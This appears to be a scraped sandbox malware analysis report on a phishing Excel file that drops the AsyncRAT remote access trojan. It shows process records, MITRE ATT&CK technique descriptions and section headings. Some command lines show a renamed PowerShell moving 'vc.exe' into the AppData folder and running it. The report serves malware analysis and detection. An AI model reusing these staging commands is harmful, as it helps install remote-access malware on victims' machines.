MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: o.exe PID: 5728 Parent PID: 1708

General

Start time:	09:31:51
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Imagebase:	0x1250000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: o.exe PID: 1560 Parent PID: 6260

General

Start time:	09:31:51
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Local\Temp\o.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Imagebase:	0x1250000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: vc.exe PID: 4896 Parent PID: 1560

General

Start time:	09:33:05
Start date:	19/11/2020
Path:	C:\Users\user\AppData\Roaming\vc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vc.exe
Imagebase:	0x780000
File size:	160312 bytes
MD5 hash:	BB7C0DFD8ECC7EEBCE937A232608695F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "1099008FEDEX_090887766.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416

General

Macro 4.0 Code

Network Behavior

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre